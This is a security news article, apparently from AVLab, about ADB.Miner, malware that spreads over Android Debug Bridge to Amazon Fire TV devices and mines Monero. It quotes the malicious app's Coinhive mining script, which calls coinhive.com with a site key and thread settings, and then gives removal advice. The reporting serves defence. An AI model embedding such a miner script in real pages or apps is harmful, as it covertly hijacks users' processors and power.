Amazon Fire TV Stick infected with an excavator of Monero cryptocurrencies

Regardless of the device on which Android is installed, it is still the same old green robot that may contain various overlays with a graphic appearance that does not resemble the original system. In terms of security, Android does not have an easy life, and this time malware authors have targeted the Amazon Fire TV Stick to extend the capabilities of ordinary TVs.

Amazon fire tv stick

XDA forum users report performance problems on Amazon Fire TV suspecting security issues. And they are not wrong, as evidenced by the code contained in the malicious application:

<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
        var miner = new CoinHive.Anonymous('eXnvyAQwXxGV80C4fGuiRiDZiDpDaSrf',{
        threads:3,
        throttle: 0.6
});
        miner.start();
</script>

Amazon Fire TV and Amazon Fire TV Stick are infected by ADB.Miner malware which installs itself to the system as a "TEST" application.

Malware Amazon Amazon Fire TV

It is not known where exactly its source, but suspected of unofficial or cracked software for watching TV channels. Additionally, ADB.Miner like a computer worm can spread to other Android devices in the same network. However, the task is difficult because the debugging feature (Android Debug Bridge) must be enabled on the smart phone or smart TV - though not always because the worm can turn on the message:

ADB Debugging

How to recognize the Amazon Fire TV Stick infection?

If you see the application on the screen "Test Ready to launch!", Your device is infected. Malware will use up to 100% of the processor's time, so all other tasks performed by the system will be significantly limited in terms of performance.

In order to completely get rid of the malware it is recommended to restore the factory settings and re-use Amazon devices with the TV. Then you have to turn off the debugging function. In addition, we recommend installing mobile anti-virus software for Android. It is also a good idea to limit the installation of applications of unknown origin, because you can not be sure exactly what code may be stitched in you.



Add new comment

The content of this field is kept private and will not be shown publicly.

Learn more about our offer

If you sell security solutions, are a distributor, authorized partner or developer and would like to share your portfolio with a group of potential customers, advertise an event, software, hardware or other services on AVLab - simply write to us. Or maybe you had to deal with ransomware? We can also help you decrypt your files.
Read more

We use Google Cloud Translation and Gengo API’s to translate articles with exception of our comparative tests.